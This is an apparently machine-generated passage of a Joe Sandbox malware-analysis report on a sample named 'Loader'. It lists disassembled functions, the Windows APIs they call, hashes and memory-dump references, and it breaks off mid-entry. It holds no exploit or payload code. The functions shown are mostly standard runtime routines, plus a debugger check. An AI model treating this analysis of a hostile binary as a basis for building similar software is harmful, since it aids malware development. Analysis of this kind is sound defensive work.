                                                                                                  • Opcode Fuzzy Hash: b719bc6efa6bb0f8cc7706b08db264266627c267e2c69932d5b9ffed221762eb
                                                                                                  • Instruction Fuzzy Hash: CF71B2B2D00225DBCB14DFA4EC45BAEBBB4FF99310F140628E814B7395E735A945CBA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(00000000,?,0093E67D), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000,?,?,00000028,00938453), ref: 0093C300
                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0094147F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 009414BD
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 009414D0
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00941518
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00941533
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: 2e663448bca0d21de502166ffc036190371760d4f86ba544db0db53ee68b485e
                                                                                                  • Instruction ID: 30f6e74a4c1d050eb1b338f5ed4a7bf3a370adef95191de573cc4b38ee70f4d6
                                                                                                  • Opcode Fuzzy Hash: 2e663448bca0d21de502166ffc036190371760d4f86ba544db0db53ee68b485e
                                                                                                  • Instruction Fuzzy Hash: 56516D72A00209ABDB24DFA5CC45FBE77B8FF88741F144429F915EB1A0E7709A848B61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction ID: d88ad5e4ee927056509c7e63304dc72c6b3548c07f0107044f5fcc62cf9fd013
                                                                                                  • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                  • Instruction Fuzzy Hash: 49022971E012199BDF14CFA9C9807AEBBB5FF88314F248269E919E7240D771AE418F91
                                                                                                  APIs
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009421C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: fb9dfed163360a23a3a05a3830e799191b3a75eec2796f34f41e5ee7d1713f08
                                                                                                  • Instruction ID: 28b38af8a32c483d1eaad4d6b034f7cabafc7dfb6db80621c33cf17404d59c5c
                                                                                                  • Opcode Fuzzy Hash: fb9dfed163360a23a3a05a3830e799191b3a75eec2796f34f41e5ee7d1713f08
                                                                                                  • Instruction Fuzzy Hash: 5971D175D091689FDF25AF24CC89EAEB7B9BF49304F9442D9F048A7211DB345E849F10
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0092F9E5
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0092FAB1
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0092FACA
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0092FAD4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: a989e965de73543617cbbbc934d9978363227b78da2a7055348a6b84ffcb4edf
                                                                                                  • Instruction ID: f839d7df67ff2ea49d092e2eba4747eacaa34f92656bca537b0edc27c73cbcfd
                                                                                                  • Opcode Fuzzy Hash: a989e965de73543617cbbbc934d9978363227b78da2a7055348a6b84ffcb4edf
                                                                                                  • Instruction Fuzzy Hash: 9231F8B5D053289BDF20DFA5DD497CDBBB8AF08300F1045AAE40CAB250E7719A849F45
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: 696cb4200a5372cecd2a0a7a503a9fe8eba6d3d590d31a6042c12bedcecc6df5
                                                                                                  • Instruction ID: ac16e40c764591f6632fd173378048ae33536e511e4a799889bc2a2b0fe7a947
                                                                                                  • Opcode Fuzzy Hash: 696cb4200a5372cecd2a0a7a503a9fe8eba6d3d590d31a6042c12bedcecc6df5
                                                                                                  • Instruction Fuzzy Hash: 7671457298021AAFDF219F949C81FBF77BD9F88311F290459F954B7282D7359C408BA2
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0092FF60
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0092FF8C
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0092FFCB
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092FFE8
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00930027
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00930044
                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00930086
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009300A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040435927-0
                                                                                                  • Opcode ID: d39713483e30036d995867c45598871dbb4eb46365247d3705966feb33caba6b
                                                                                                  • Instruction ID: ee999a9ef3234c13e5a853d667ba9e1e81bb5b3c031d827fc850e288f501ae21
                                                                                                  • Opcode Fuzzy Hash: d39713483e30036d995867c45598871dbb4eb46365247d3705966feb33caba6b
                                                                                                  • Instruction Fuzzy Hash: C9519972A0021AAFEB249F61DC55FAB7BB9EF84751F244429F914EA190DB74CC40DFA0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction ID: 309372e1b85383027f5ab3e61afc9e9d3cd39e927fa71fceb5061bf3fbab3fd7
                                                                                                  • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                  • Instruction Fuzzy Hash: 1BB15672E04355EFDB158FA8CC91BAF7BA9EF59310F144175E814AB282D6749D01CFA0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00930E67
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00930E6F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00930EF8
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00930F23
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00930F78
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: d0ee12062e6cad934c549d305aadf4b93fbda64d5c833552a195fbf998267a10
                                                                                                  • Instruction ID: dc4f7d723b56022951349d52ed5de25e9776a3fcc1ff5368f708d17582526add
                                                                                                  • Opcode Fuzzy Hash: d0ee12062e6cad934c549d305aadf4b93fbda64d5c833552a195fbf998267a10
                                                                                                  • Instruction Fuzzy Hash: 7A41C134A002199BCF20EF69C895A9EBBA5EFC4324F148555F9189B392D731EE05CF91
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,0093D10A,00921170,0092ABA8,?,?), ref: 0093D0BC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: 5b303bd13b3eab0dc19e34b9bd4e972680ab6d6bcc8e5fa19373778bd64c5abb
                                                                                                  • Instruction ID: 50e4c0312ccbe0be5f2c6e192723abfd401000311d5db4a982b8b861695c0767
                                                                                                  • Opcode Fuzzy Hash: 5b303bd13b3eab0dc19e34b9bd4e972680ab6d6bcc8e5fa19373778bd64c5abb
                                                                                                  • Instruction Fuzzy Hash: E4210531B03310ABC7359B72FC51A6A33AC9B81B61F250610E955A72D0DB30ED02DBD1
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00930176
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00930184
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00930195
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                  • API String ID: 667068680-1047828073
                                                                                                  • Opcode ID: 05b0a231592d6d5eb061e52f4506b444e09de8878fef4f775197cd1509362463
                                                                                                  • Instruction ID: 3e2c8d6c8a933c610e6dcb376aa83955c6ed738acd1eaa683c4302c31aeafba7
                                                                                                  • Opcode Fuzzy Hash: 05b0a231592d6d5eb061e52f4506b444e09de8878fef4f775197cd1509362463
                                                                                                  • Instruction Fuzzy Hash: F1D05E7153A320BF8350DF7FFC0D8857A64EB847573420165FD81D3214DB7004849794
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44112cdf27bd4410dd2d01fe9c2e57266c3072c7de5b903ae712f1479b804564
                                                                                                  • Instruction ID: fcf05ca5ac0fb5d35b8737717aa2b0c51d67ff2ec5dfff3efc36c73c20222655
                                                                                                  • Opcode Fuzzy Hash: 44112cdf27bd4410dd2d01fe9c2e57266c3072c7de5b903ae712f1479b804564
                                                                                                  • Instruction Fuzzy Hash: F7B104B4A08A49EFDB21DFE9C880FAEBBB5AF85344F154158E41197293C7B09941CFA0
                                                                                                  APIs
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E37
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E48
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E5C
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E7D
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929E8E
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00929EA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 2134207285-0
                                                                                                  • Opcode ID: 2a4bf6f0f59a9c0a4573baba9315835f35123cd182a05518b2e58b812665c8b0
                                                                                                  • Instruction ID: f17e8e28457241dcd3823af1869ac1ec060c1508bd3be849648f3fc04e849a5d
                                                                                                  • Opcode Fuzzy Hash: 2a4bf6f0f59a9c0a4573baba9315835f35123cd182a05518b2e58b812665c8b0
                                                                                                  • Instruction Fuzzy Hash: 5841E5B1900720CBDB30DB64A9467AFB7F9BF86320F04062DE57A262DAD7746500CB52
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,0093ADCE,00930850,0092B86F,BB40E64E,?,?,?,?,0094C0BA,000000FF), ref: 0093ADE5
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0093ADF3
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0093AE0C
                                                                                                  • SetLastError.KERNEL32(00000000,?,0093ADCE,00930850,0092B86F,BB40E64E,?,?,?,?,0094C0BA,000000FF), ref: 0093AE5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 30f2df3fd78e922b919e47295783ff68cbc09be37fd02566fb9a7040db7fd327
                                                                                                  • Instruction ID: a04c1bb0995379b5b4429e794afa58314dc0ed7ec469f782a2ac2215635715ee
                                                                                                  • Opcode Fuzzy Hash: 30f2df3fd78e922b919e47295783ff68cbc09be37fd02566fb9a7040db7fd327
                                                                                                  • Instruction Fuzzy Hash: 8201AC7711D7159DE73427B6BC95E2B27E8DB53B76B20032AF660450E1EF618C026B42
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0093B77D
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0093B9F6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: 798925fd6bb7ecaac27e5db3d2be8beaec91a231f89d4b1dae97a1163cea2880
                                                                                                  • Instruction ID: f469aad745b3960b36961a0ddc208c05e085dde2a27ee1ecc847c20d0cb87aff
                                                                                                  • Opcode Fuzzy Hash: 798925fd6bb7ecaac27e5db3d2be8beaec91a231f89d4b1dae97a1163cea2880
                                                                                                  • Instruction Fuzzy Hash: 35B1CC75800209EFCF18DFA4C881AAEBBB9FF84315F10455AFA15AB216D734DA51CF92
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 0092C034
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 0092C118
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: 24bf981d91e1689b8e4f979c5ac56acbcc658a580804d68d9633e8711946119c
                                                                                                  • Instruction ID: 99a43db571bcf86c6fffa31daeb98139f0cd99a62ab6ca2b7cf4aa77657b3384
                                                                                                  • Opcode Fuzzy Hash: 24bf981d91e1689b8e4f979c5ac56acbcc658a580804d68d9633e8711946119c
                                                                                                  • Instruction Fuzzy Hash: 8241BAB5800214DFCF24EF68E545AAEB7F9AF88300F58806EE445A7256C734AA44CB51
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0094BF84,000000FF,?,00935775,0093565C,?,00935811,00000000), ref: 009356E9
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0094BF84,000000FF,?,00935775,0093565C,?,00935811,00000000), ref: 009356FB
